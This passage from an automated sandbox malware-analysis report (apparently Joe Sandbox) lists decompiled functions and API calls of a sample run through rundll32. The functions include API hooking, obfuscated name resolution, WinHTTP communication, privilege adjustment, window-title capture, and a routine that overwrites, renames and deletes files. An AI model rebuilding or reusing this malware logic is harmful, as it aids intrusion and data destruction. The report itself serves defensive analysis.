							 *((intOrPtr*)(_t43 + _t33 + 0x14)) =  *((intOrPtr*)(_t33 + _t41 - 4));
							memcpy(_t32, _t41, _t33 - 1 >> 2 << 2);
							_t43 =  &(_t43[3]);
						} else {
							if(_t33 != 0) {
								 *_t32 =  *_t41 & 0x000000ff;
								if((_t33 & 0x00000002) != 0) {
									 *((short*)(_t32 + _t33 - 2)) =  *(_t33 + _t41 - 2) & 0x0000ffff;
								}
							}
						}
						_v552 = 0x5c;
						 *_t43 = _t32;
						_t24 = wcsrchr(??, ??);
						if(_t24 == 0) {
							L8:
							_v552 = 0x2e;
							 *_t43 = _t32;
							_t25 = wcsrchr(??, ??);
							if(_t25 != 0) {
								 *_t25 = 0;
							}
							 *_t43 = _t32;
							return (wcslen(??) & 0xffffff00 | _t26 == 0x00000020) & 0x000000ff;
						} else {
							_t29 =  &(_t24[0]);
							_t32 = _t29;
							if(_t29 == 0) {
								goto L2;
							} else {
								goto L8;
							}
						}
					} else {
						goto L2;
					}
				}
			}

0x63c08993
0x63c08999
0x63c089a2
0x63c089b3
0x63c089c1
0x63c089a4
0x63c089a4
0x63c089a7
0x63c089b1
0x63c089c2
0x63c089c2
0x63c089c6
0x63c089cd
0x63c08a36
0x63c08a40
0x63c08a40
0x63c089cf
0x63c089d1
0x63c089d9
0x63c089db
0x63c08a49
0x63c08a49
0x63c089db
0x63c089d1
0x63c089dd
0x63c089e5
0x63c089e8
0x63c089ef
0x63c089f8
0x63c089f8
0x63c08a00
0x63c08a03
0x63c08a0a
0x63c08a0e
0x63c08a0e
0x63c08a11
0x63c08a2b
0x63c089f1
0x63c089f1
0x63c089f4
0x63c089f6
0x00000000
0x00000000
0x00000000
0x00000000
0x63c089f6
0x00000000
0x00000000
0x00000000
0x63c089b1

APIs

wcslen.MSVCRT ref: 63C089A7
wcsrchr.MSVCRT ref: 63C089E8
wcsrchr.MSVCRT ref: 63C08A03
wcslen.MSVCRT ref: 63C08A14

Strings

., xrefs: 63C089F8

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 00230BD0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60

APIs

CreateProcessW.KERNEL32 ref: 00230C69
calloc.MSVCRT ref: 00230C87
CloseHandle.KERNEL32 ref: 00230CBB
CloseHandle.KERNEL32 ref: 00230CC7

Strings

D, xrefs: 00230C1F

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00232679, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49

APIs

RegCloseKey.ADVAPI32 ref: 00232669
FileTimeToSystemTime.KERNEL32(?), ref: 002326AB
calloc.MSVCRT ref: 002326C3
free.MSVCRT ref: 00232723

Strings

d, xrefs: 002326D7

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022EEDC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41

APIs

Part of subcall function 0022DF40: WinHttpReceiveResponse.WINHTTP ref: 0022DF6D
Part of subcall function 0022DF40: WinHttpQueryDataAvailable.WINHTTP ref: 0022DF92
Part of subcall function 0022DF40: GetLastError.KERNEL32 ref: 0022DFA5
Part of subcall function 0022DF40: free.MSVCRT ref: 0022DFEA
Part of subcall function 0022DF40: realloc.MSVCRT ref: 0022E007
Part of subcall function 0022DF40: WinHttpReadData.WINHTTP ref: 0022E030

strchr.MSVCRT ref: 0022EECB
isspace.MSVCRT ref: 0022EEEE
isspace.MSVCRT ref: 0022EF0A
strchr.MSVCRT ref: 0022EF1F
free.MSVCRT(?,?,00000000,?,0022E420), ref: 0022EF45
strstr.MSVCRT ref: 0022EF64
isspace.MSVCRT ref: 0022EF80
isspace.MSVCRT ref: 0022EFA0
strchr.MSVCRT ref: 0022EFBF
_strdup.MSVCRT(?,?,00000000,?,0022E420), ref: 0022EFDB
free.MSVCRT(?,?,00000000,?,0022E420), ref: 0022EFFB
strstr.MSVCRT ref: 0022F02B
strchr.MSVCRT ref: 0022F043
MultiByteToWideChar.KERNEL32 ref: 0022F085
strchr.MSVCRT ref: 0022F09C
atoi.MSVCRT ref: 0022F0AE
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0022E420), ref: 0022F0F0
free.MSVCRT ref: 0022F0FC

Part of subcall function 0022DD90: WinHttpConnect.WINHTTP ref: 0022DDC2
Part of subcall function 0022DD90: WinHttpOpenRequest.WINHTTP ref: 0022DE1F
Part of subcall function 0022DD90: WinHttpSendRequest.WINHTTP ref: 0022DE6A
Part of subcall function 0022DD90: WinHttpWriteData.WINHTTP ref: 0022DEAA
Part of subcall function 0022DD90: GetLastError.KERNEL32 ref: 0022DED0
Part of subcall function 0022DD90: WinHttpSendRequest.WINHTTP ref: 0022DF11

free.MSVCRT ref: 0022F17A

Strings

>, xrefs: 0022EF14

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C08B49, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38

C-Code - Quality: 53%

			E63C08B49(void* __ebx, void* __edx, long _a4, struct HINSTANCE__* _a8, DWORD* _a12, struct HINSTANCE__* _a28, void* _a52, intOrPtr _a56) {
				void* _t16;

				__eax = E63C07E80(7);
				if(__eax != 0) {
					L1:
					return _t16;
				} else {
					__eax = _a52;
					__edi =  &_a28;
					__eax = VirtualProtect(_a52, 4, 0x40, __edi);
					__esp = __esp - 0x10;
					if(__eax == 0) {
						goto L1;
					} else {
						__eax = _a52;
						if(_a56 == 0) {
							if(__eax->i == E63C08C60) {
								__eax = E63C07E80(0xc);
								__eax = GetModuleHandleW(__eax);
								__esp = __esp - 4;
								__eax = GetProcAddress(__eax, __ebx);
								__esp = __esp - 8;
								 *_a52 = __eax;
							}
						} else {
							__eax->i = E63C08C60;
						}
						__eax = _a28;
						_a12 = __edi;
						_a4 = 4;
						_a8 = _a28;
						__eax = _a52;
						 *__esp = _a52;
						__eax = VirtualProtect(??, ??, ??, ??);
						__esp = __esp - 0x10;
						__esp =  &(__esp[8]);
						_pop(__ebx);
						_pop(__edi);
						return __eax;
					}
				}
			}

0x63c08b57
0x63c08b6a
0x63c08ab2
0x63c08ab8
0x63c08b70
0x63c08ae1
0x63c08ae5
0x63c08b00
0x63c08b06
0x63c08b0b
0x00000000
0x63c08b0d
0x63c08b11
0x63c08b17
0x63c08b82
0x63c08b8b
0x63c08b93
0x63c08b99
0x63c08ba3
0x63c08ba9
0x63c08bb0
0x63c08bb0
0x63c08b19
0x63c08b19
0x63c08b19
0x63c08b1b
0x63c08b1f
0x63c08b23
0x63c08b2b
0x63c08b2f
0x63c08b33
0x63c08b36
0x63c08b3c
0x63c08b3f
0x63c08b42
0x63c08b44
0x63c08b45
0x63c08b45
0x63c08b0b

APIs

VirtualProtect.KERNEL32 ref: 63C08B00
VirtualProtect.KERNEL32 ref: 63C08B36
strcmp.MSVCRT ref: 63C08B63
GetModuleHandleW.KERNEL32 ref: 63C08B93
GetProcAddress.KERNEL32 ref: 63C08BA3

Strings

%-=wOm>w, xrefs: 63C08B00
@, xrefs: 63C08AE9

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 63C08AB9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37

C-Code - Quality: 45%

			E63C08AB9(void* __ebx, void* __edx, long _a4, struct HINSTANCE__* _a8, DWORD* _a12, struct HINSTANCE__* _a28, void* _a52, intOrPtr _a56) {
				void* _t17;

				 *__esp = 2;
				__esi = E63C08C10;
				__eax = E63C07E80();
				if(__eax != 0) {
					__eax = E63C07E80(7);
					if(__eax != 0) {
						goto L1;
					} else {
						__esi = E63C08C60;
						goto L3;
					}
				} else {
					L3:
					__eax = _a52;
					__edi =  &_a28;
					__eax = VirtualProtect(_a52, 4, 0x40, __edi);
					__esp = __esp - 0x10;
					if(__eax == 0) {
						L1:
						return _t17;
					} else {
						__eax = _a52;
						if(_a56 == 0) {
							if(__eax->i == __esi) {
								__eax = E63C07E80(0xc);
								__eax = GetModuleHandleW(__eax);
								__esp = __esp - 4;
								__eax = GetProcAddress(__eax, __ebx);
								__esp = __esp - 8;
								 *_a52 = __eax;
							}
						} else {
							__eax->i = __esi;
						}
						__eax = _a28;
						_a12 = __edi;
						_a4 = 4;
						_a8 = _a28;
						__eax = _a52;
						 *__esp = _a52;
						__eax = VirtualProtect(??, ??, ??, ??);
						__esp = __esp - 0x10;
						__esp =  &(__esp[8]);
						_pop(__ebx);
						_pop(__esi);
						_pop(__edi);
						return __eax;
					}
				}
			}

0x63c08ac0
0x63c08ac7
0x63c08acc
0x63c08adf
0x63c08b57
0x63c08b6a
0x00000000
0x63c08b70
0x63c08b70
0x00000000
0x63c08b70
0x63c08ae1
0x63c08ae1
0x63c08ae1
0x63c08ae5
0x63c08b00
0x63c08b06
0x63c08b0b
0x63c08ab2
0x63c08ab8
0x63c08b0d
0x63c08b11
0x63c08b17
0x63c08b82
0x63c08b8b
0x63c08b93
0x63c08b99
0x63c08ba3
0x63c08ba9
0x63c08bb0
0x63c08bb0
0x63c08b19
0x63c08b19
0x63c08b19
0x63c08b1b
0x63c08b1f
0x63c08b23
0x63c08b2b
0x63c08b2f
0x63c08b33
0x63c08b36
0x63c08b3c
0x63c08b3f
0x63c08b42
0x63c08b43
0x63c08b44
0x63c08b45
0x63c08b45
0x63c08b0b

APIs

strcmp.MSVCRT ref: 63C08AD8
VirtualProtect.KERNEL32 ref: 63C08B00
VirtualProtect.KERNEL32 ref: 63C08B36
strcmp.MSVCRT ref: 63C08B63
GetModuleHandleW.KERNEL32 ref: 63C08B93
GetProcAddress.KERNEL32 ref: 63C08BA3

Strings

%-=wOm>w, xrefs: 63C08B00
@, xrefs: 63C08AE9

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 63C07170, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32

APIs

strlen.MSVCRT ref: 63C0717A
strrchr.MSVCRT ref: 63C071BD

Strings

CreateActCtxA, xrefs: 63C071D3
L2MUnEmcxzqXtRWYSB8T6bi0HlJGeKgoa7QrjPAh31.9OkZVNFdI4s5ypvDCfuw, xrefs: 63C07197, 63C071C6
cM6wJvsPKh1B2d9IQoz78umjFZDrSUaNWGi.k0HRYX4VyCbfqETnxLpOAgel5t3, xrefs: 63C07190, 63C071B2

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 00230B5C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26

APIs

LookupPrivilegeValueW.ADVAPI32 ref: 00230AD2
AdjustTokenPrivileges.ADVAPI32 ref: 00230B32
CloseHandle.KERNEL32 ref: 00230B48
GetLastError.KERNEL32 ref: 00230B60
ImpersonateSelf.ADVAPI32 ref: 00230B74
GetCurrentThread.KERNEL32 ref: 00230B81
OpenThreadToken.ADVAPI32 ref: 00230B9A
GetLastError.KERNEL32 ref: 00230BB2

Strings

(, xrefs: 00230B8F

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022DB10, Relevance: 7.6, APIs: 6, Instructions: 117

APIs

Part of subcall function 00233F40: calloc.MSVCRT ref: 00233FB5
Part of subcall function 00233F40: free.MSVCRT ref: 00234010
Part of subcall function 00233F40: free.MSVCRT ref: 0023403C
Part of subcall function 00233F40: calloc.MSVCRT ref: 00234058
Part of subcall function 00233F40: memcpy.MSVCRT ref: 00234072

Part of subcall function 0022D0B0: memcpy.MSVCRT ref: 0022D13A
Part of subcall function 0022D0B0: calloc.MSVCRT ref: 0022D159

free.MSVCRT ref: 0022DBFF
free.MSVCRT ref: 0022DC1E
free.MSVCRT ref: 0022DC5E
free.MSVCRT ref: 0022DC7B
free.MSVCRT ref: 0022DC99
free.MSVCRT ref: 0022DCA3

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C07070, Relevance: 7.6, APIs: 6, Instructions: 74

APIs

malloc.MSVCRT ref: 63C070BB
memset.MSVCRT ref: 63C070D1
memcpy.MSVCRT ref: 63C070E3
free.MSVCRT ref: 63C070F9
malloc.MSVCRT ref: 63C07117

Part of subcall function 63C06F70: malloc.MSVCRT ref: 63C06F82
Part of subcall function 63C06F70: wcslen.MSVCRT ref: 63C06F9E
Part of subcall function 63C06F70: malloc.MSVCRT ref: 63C06FAA
Part of subcall function 63C06F70: wcscpy.MSVCRT ref: 63C06FBB

malloc.MSVCRT ref: 63C0714A

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 0022F1E0, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

WaitForSingleObject.KERNEL32 ref: 0022F210
SetEvent.KERNEL32(?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F238
Sleep.KERNEL32(?,?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F244
calloc.MSVCRT ref: 0022F268
SetEvent.KERNEL32(?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F29B

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00230FB0, Relevance: 7.6, APIs: 5, Instructions: 64

APIs

CreateFileW.KERNEL32 ref: 00231000
SetFilePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002305BD), ref: 00231030
WriteFile.KERNEL32 ref: 0023105D
CloseHandle.KERNEL32 ref: 0023106D
CloseHandle.KERNEL32 ref: 002310A3

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022F3B9, Relevance: 7.6, APIs: 5, Instructions: 57

APIs

Part of subcall function 0022F1E0: WaitForSingleObject.KERNEL32 ref: 0022F210
Part of subcall function 0022F1E0: SetEvent.KERNEL32(?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F238
Part of subcall function 0022F1E0: Sleep.KERNEL32(?,?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F244
Part of subcall function 0022F1E0: calloc.MSVCRT ref: 0022F268
Part of subcall function 0022F1E0: SetEvent.KERNEL32(?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F29B

Part of subcall function 002215B0: GetTickCount.KERNEL32 ref: 002215B8

GetTickCount.KERNEL32 ref: 0022F3FD
GetTickCount.KERNEL32 ref: 0022F40F
Sleep.KERNEL32 ref: 0022F420
PeekNamedPipe.KERNEL32 ref: 0022F469

Part of subcall function 0022F2D0: WaitForSingleObject.KERNEL32 ref: 0022F2E8
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F2FB
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F315
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F32E
Part of subcall function 0022F2D0: TerminateProcess.KERNEL32 ref: 0022F350

free.MSVCRT ref: 0022F498
realloc.MSVCRT ref: 0022F505
ReadFile.KERNEL32 ref: 0022F532
WaitForSingleObject.KERNEL32 ref: 0022F55E
free.MSVCRT ref: 0022F5C8

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C06FD0, Relevance: 7.6, APIs: 6, Instructions: 55

APIs

free.MSVCRT ref: 63C06FF9
free.MSVCRT ref: 63C07006
free.MSVCRT ref: 63C07014
free.MSVCRT ref: 63C07027
free.MSVCRT ref: 63C07036
free.MSVCRT ref: 63C07044

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 00235740, Relevance: 7.6, APIs: 5, Instructions: 54

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00235779
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002214F2), ref: 0023578A
GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002214F2), ref: 00235792
GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002214F2), ref: 0023579A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002214F2), ref: 002357A9

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0023172C, Relevance: 7.5, APIs: 5, Instructions: 48

APIs

FindNextFileW.KERNEL32 ref: 0023173D
wcscmp.MSVCRT ref: 00231760
wcscmp.MSVCRT ref: 00231778
memset.MSVCRT ref: 00231794

Part of subcall function 002315D0: calloc.MSVCRT ref: 002315F0
Part of subcall function 002315D0: calloc.MSVCRT ref: 00231606
Part of subcall function 002315D0: calloc.MSVCRT ref: 0023161C
Part of subcall function 002315D0: wcscmp.MSVCRT ref: 00231647
Part of subcall function 002315D0: free.MSVCRT ref: 002316A1
Part of subcall function 002315D0: GetFileAttributesW.KERNEL32 ref: 002316AD
Part of subcall function 002315D0: memset.MSVCRT ref: 002316DE
Part of subcall function 002315D0: RemoveDirectoryW.KERNEL32 ref: 002317F8
Part of subcall function 002315D0: free.MSVCRT ref: 00231813
Part of subcall function 002315D0: free.MSVCRT ref: 0023181F
Part of subcall function 002315D0: GetLastError.KERNEL32 ref: 002319B1
Part of subcall function 002315D0: memset.MSVCRT ref: 002319CC
Part of subcall function 002315D0: memset.MSVCRT ref: 002319E8
Part of subcall function 002315D0: free.MSVCRT ref: 002319F0
Part of subcall function 002315D0: free.MSVCRT ref: 002319F8

memset.MSVCRT ref: 00231884
memset.MSVCRT ref: 002318EA

Part of subcall function 002310B0: calloc.MSVCRT ref: 002310F6
Part of subcall function 002310B0: calloc.MSVCRT ref: 0023110E
Part of subcall function 002310B0: calloc.MSVCRT ref: 00231128
Part of subcall function 002310B0: calloc.MSVCRT ref: 00231140
Part of subcall function 002310B0: time.MSVCRT ref: 00231150
Part of subcall function 002310B0: srand.MSVCRT ref: 00231158
Part of subcall function 002310B0: wcscmp.MSVCRT ref: 00231186
Part of subcall function 002310B0: CreateFileW.KERNEL32 ref: 0023121F
Part of subcall function 002310B0: GetFileSize.KERNEL32 ref: 0023123E
Part of subcall function 002310B0: SetFilePointer.KERNEL32 ref: 0023129C
Part of subcall function 002310B0: WriteFile.KERNEL32 ref: 002312CE
Part of subcall function 002310B0: SetFilePointer.KERNEL32 ref: 00231305
Part of subcall function 002310B0: WriteFile.KERNEL32 ref: 0023133B
Part of subcall function 002310B0: SetFilePointer.KERNEL32 ref: 0023137B
Part of subcall function 002310B0: SetEndOfFile.KERNEL32 ref: 00231387
Part of subcall function 002310B0: CloseHandle.KERNEL32 ref: 00231393
Part of subcall function 002310B0: _wsplitpath.MSVCRT ref: 002313D6
Part of subcall function 002310B0: rand.MSVCRT ref: 002313E5
Part of subcall function 002310B0: rand.MSVCRT ref: 00231400
Part of subcall function 002310B0: wcscmp.MSVCRT ref: 00231457
Part of subcall function 002310B0: MoveFileW.KERNEL32 ref: 002314CC
Part of subcall function 002310B0: memset.MSVCRT ref: 002314F2
Part of subcall function 002310B0: DeleteFileW.KERNEL32 ref: 002314FE
Part of subcall function 002310B0: GetLastError.KERNEL32 ref: 00231510
Part of subcall function 002310B0: free.MSVCRT ref: 0023151F
Part of subcall function 002310B0: free.MSVCRT ref: 0023152B
Part of subcall function 002310B0: free.MSVCRT ref: 00231537
Part of subcall function 002310B0: free.MSVCRT ref: 00231543

FindNextFileW.KERNEL32 ref: 0023192A
memset.MSVCRT ref: 00231950
memset.MSVCRT ref: 0023196C
free.MSVCRT ref: 00231974
free.MSVCRT ref: 0023197C
free.MSVCRT ref: 00231997
free.MSVCRT ref: 002319A3

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00231BD0, Relevance: 7.5, APIs: 5, Instructions: 44

APIs

calloc.MSVCRT ref: 00231BE5
GetForegroundWindow.USER32 ref: 00231BF0
GetWindowTextW.USER32 ref: 00231C09
free.MSVCRT ref: 00231C1B
calloc.MSVCRT ref: 00231C3E

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022F2D0, Relevance: 7.5, APIs: 5, Instructions: 40

APIs

WaitForSingleObject.KERNEL32 ref: 0022F2E8
CloseHandle.KERNEL32 ref: 0022F2FB
CloseHandle.KERNEL32 ref: 0022F315
CloseHandle.KERNEL32 ref: 0022F32E
TerminateProcess.KERNEL32 ref: 0022F350

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C071E0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77

C-Code - Quality: 50%

			E63C071E0() {
				struct HINSTANCE__* _t23;
				char* _t27;
				intOrPtr _t29;
				_Unknown_base(*)()* _t30;
				struct HINSTANCE__* _t33;
				signed int _t37;
				void _t43;
				signed int _t45;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				void* _t49;
				void* _t55;

				_t45 = 0;
				_t47 = _t46 - 0x2c;
				 *_t47 = E63C07170("CS.JSZYM4TZZ");
				_t23 = GetModuleHandleA(??);
				_t48 = _t47 - 4;
				 *(_t48 + 0x1c) = _t23;
				memset(0x63c3a8c0, 0, 0x208 << 2);
				_t49 = _t48 + 0xc;
				if(_t23 == 0) {
					L13:
					return 0;
				} else {
					do {
						_t27 =  *((intOrPtr*)(0x63c15004 + _t45 * 8));
						if(_t27 == 0) {
							_t43 =  *(_t49 + 0x1c);
							goto L9;
						} else {
							_t43 =  *0x63c3a8c0; // 0x0
							if(_t43 == 0) {
								goto L7;
							} else {
								_t55 = _t27 -  *0x63c3a8c4; // 0x0
								if(_t55 == 0) {
									L9:
									_t29 = E63C07170( *((intOrPtr*)(_t45 * 8 +  &E63C15000)));
									 *_t49 = _t43;
									 *((intOrPtr*)(_t49 + 4)) = _t29;
									_t30 = GetProcAddress(??, ??);
									_t49 = _t49 - 8;
									 *(0x63c3a840 + _t45 * 4) = _t30;
									if(_t30 == 0) {
										goto L13;
									} else {
										goto L10;
									}
								} else {
									_t37 = 0;
									while(1) {
										_t37 = _t37 + 1;
										_t43 =  *(0x63c3a8c0 + _t37 * 8);
										if(_t43 == 0) {
											break;
										}
										if(_t27 ==  *((intOrPtr*)(0x63c3a8c4 + _t37 * 8))) {
											goto L9;
										} else {
											continue;
										}
										goto L15;
									}
									L7:
									 *_t49 = E63C07170(_t27);
